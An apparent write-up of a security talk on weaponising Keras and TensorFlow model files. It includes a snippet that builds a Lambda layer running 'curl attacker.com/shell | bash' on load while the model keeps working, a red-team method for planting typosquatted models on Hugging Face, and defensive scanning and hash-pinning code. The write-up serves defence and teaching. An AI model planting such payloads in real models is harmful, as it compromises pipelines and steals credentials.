Confused Learning: Supply Chain Attacks through Machine Learning Models
This talk demonstrates how machine learning models can be weaponized to deliver malicious payloads by embedding arbitrary code within the model serialization formats used by Keras and TensorFlow. The researchers show how attackers can exploit the trust and lack of security controls in public model repositories like Hugging Face to perform supply chain attacks. The presentation provides a practical methodology for red teams to identify, weaponize, and deploy malicious models, while also introducing the 'Bhakti' tool for detecting such threats. The talk emphasizes that ML expertise is not required to execute these attacks, highlighting a significant security gap in current MLOps pipelines.
Weaponizing Machine Learning Models: Arbitrary Code Execution via Model Serialization
TLDR: Machine learning models are not just static data files; they are executable programs that can be weaponized to achieve arbitrary code execution. By embedding malicious payloads into the serialization formats used by Keras and TensorFlow, attackers can compromise MLOps pipelines and gain persistent access to internal infrastructure. Security researchers and red teams should treat model files as untrusted input and implement strict static analysis to detect embedded malicious code before deployment.
Machine learning models are the new black boxes of the enterprise. While security teams spend thousands of hours auditing web applications and cloud infrastructure, they often treat model files—the massive, opaque blobs of weights and biases—as inert data. This is a dangerous oversight. As demonstrated in recent research, these files are frequently full-blown software programs that, when loaded by a standard library, execute arbitrary code. If you are a pentester or a bug bounty hunter, you should stop looking only at the application layer and start looking at the model supply chain.
The Mechanics of Model Hijacking
The vulnerability lies in how modern machine learning frameworks handle model serialization. The formats used by Keras and TensorFlow (HDF5 and SavedModel, for example) often allow for the inclusion of custom layers or metadata that execute arbitrary Python code upon deserialization. When a developer or an automated MLOps pipeline loads a model, the framework faithfully interprets these embedded instructions.
Consider the Keras Lambda layer. It is designed to let developers define custom operations within a model architecture. However, because it can wrap arbitrary Python expressions, it becomes a trivial vector for code execution. An attacker can craft a model that, when loaded via keras.models.load_model(), executes a reverse shell or fetches a second-stage payload from a remote server.
The following snippet illustrates how easily a malicious layer can be injected into a Keras model:
```python
from tensorflow import keras

# Injecting a payload into a Keras Lambda layer. The tuple trick runs the
# payload via exec() while still passing the tensor through unchanged, so
# the model keeps working and the backdoor goes unnoticed.
infusion = keras.layers.Lambda(
    lambda x: (exec("import os; os.system('curl attacker.com/shell | bash')"), x)[1]
)

model = keras.Sequential([
    keras.layers.Dense(5, input_shape=(3,)),
    infusion,
    keras.layers.Dense(2, activation='softmax')
])
model.save("malicious_model.h5")
```
When this model is loaded in a production environment, the exec payload runs with the privileges of the user or service account running the model. This is a classic OWASP A03:2021-Injection scenario, but it is happening inside the data science stack, which is often shielded from traditional security tooling.
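Why does loading a file execute code at all? Keras has historically serialized Lambda functions by marshalling their compiled bytecode into the model config, and deserializing marshalled bytecode is equivalent to running attacker-supplied code. The following standard-library sketch (a simplified illustration, not Keras's exact implementation) shows the round trip:

```python
import base64
import marshal
import types

# Serialization side: the lambda's compiled bytecode is marshalled and
# base64-encoded, roughly how a Lambda layer ends up inside a model config.
payload = lambda x: x * 2  # stand-in for an attacker-controlled function
encoded = base64.b64encode(marshal.dumps(payload.__code__))

# Deserialization side (the victim's machine): a live function object is
# rebuilt from the stored bytecode. Whatever the attacker marshalled in
# now runs with the loader's privileges.
code = marshal.loads(base64.b64decode(encoded))
restored = types.FunctionType(code, globals())
print(restored(21))  # the rebuilt function executes: prints 42
```

There is no signature or sandbox in this path; the deserializer cannot tell a benign activation function from a dropper.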
Exploiting the MLOps Supply Chain
Public model repositories like Hugging Face have become the primary distribution point for pre-trained models. These platforms rely on social proof—stars, downloads, and community trust—to validate the quality of a model. Attackers are already exploiting this by creating "typosquatted" organizations and uploading malicious models that appear to be legitimate, high-performance tools.
During a red team engagement, you don't need to be a machine learning expert to execute this. You need to identify where the target organization pulls its models. If they are using an automated pipeline that pulls from public repositories, you can perform a supply chain attack by uploading a backdoored model that mimics a popular, legitimate one. Once a data scientist or an automated script pulls your model, you have a foothold in their environment.
The impact is significant. Because these models are often deployed in high-privilege environments—such as cloud-based training clusters or production inference servers—you gain immediate access to sensitive data, internal API keys, and the ability to pivot into the broader network.
Detection and Defensive Strategies
Defenders are currently struggling to keep up. Traditional malware scanners like ClamAV are largely ineffective here because they are not designed to parse complex model serialization formats or detect malicious logic embedded within them. Furthermore, many EDR solutions treat the resulting behavior as benign because they expect a machine learning workload to perform heavy computation and network activity.
To detect these threats, you need to move beyond signature-based scanning. Static analysis is your best bet. Tools like Modelscan are specifically designed to inspect model files for suspicious layers or embedded code without executing them. For more granular control, you can write custom YARA rules to scan for specific patterns, such as the presence of Lambda layers or pickle serialization in model metadata.
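The same idea can be prototyped in a few lines. The sketch below (a hypothetical helper, not modelscan's API) walks the JSON model config that Keras stores alongside the weights and flags layer classes that can carry executable code; the layer names in the sample config are illustrative:

```python
import json

# Layer classes that can embed arbitrary code or Python operations.
SUSPICIOUS_LAYERS = {"Lambda", "TFOpLambda"}

def find_suspicious_layers(model_config: str) -> list[str]:
    """Return the names of layers whose class can embed arbitrary code."""
    config = json.loads(model_config)
    hits = []

    def walk(node):
        if isinstance(node, dict):
            if node.get("class_name") in SUSPICIOUS_LAYERS:
                hits.append(node.get("config", {}).get("name", "<unnamed>"))
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config)
    return hits

# Minimal config mimicking the shape Keras stores in an .h5 file's
# model_config attribute (structure simplified for illustration).
sample = json.dumps({
    "class_name": "Sequential",
    "config": {"layers": [
        {"class_name": "Dense", "config": {"name": "dense"}},
        {"class_name": "Lambda", "config": {"name": "infusion"}},
    ]},
})
print(find_suspicious_layers(sample))  # ['infusion']
```

Crucially, this inspection never imports TensorFlow and never deserializes the model, so the payload has no chance to fire during the scan.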
If you are performing a security assessment, your methodology should include:
- Inventory: Map out every source of model files in the organization.
- Static Analysis: Use tools like modelscan or custom scripts to inspect the metadata of these files.
- Isolation: Ensure that model loading occurs in a sandboxed environment with no egress traffic, preventing the model from "phoning home" if it is triggered.
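Provenance can also be enforced mechanically before any loader touches the file: pin the SHA-256 of each vetted model and refuse anything that does not match. A minimal sketch (the file name, its contents, and the manifest source are illustrative assumptions):

```python
import hashlib
from pathlib import Path

def verify_model(path: str, pinned_sha256: str) -> bool:
    """Refuse to load a model whose digest does not match the pinned hash."""
    digest = hashlib.sha256(Path(path).read_bytes()).hexdigest()
    return digest == pinned_sha256

# Illustrative usage: in practice the pinned hash would come from a trusted
# manifest, recorded when the model was first reviewed and approved.
model_file = Path("model.h5")
model_file.write_bytes(b"fake model bytes for demonstration")
pinned = hashlib.sha256(b"fake model bytes for demonstration").hexdigest()

if verify_model("model.h5", pinned):
    print("hash OK, safe to hand to the loader")
else:
    print("hash mismatch: refusing to load")
```

This does not detect a backdoor on first contact, but it guarantees that the exact bytes you audited are the bytes your pipeline deploys, which defeats silent swaps of a previously vetted model.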
The era of treating machine learning models as simple data files is over. As these models become more deeply integrated into critical business processes, they will become a primary target for attackers. If you aren't auditing the models in your supply chain, you are leaving the front door wide open. Start by inspecting the serialization formats and questioning the provenance of every model you pull into your environment. The next major breach might not come from a vulnerable web server, but from a "pre-trained" model that was never meant to be trusted.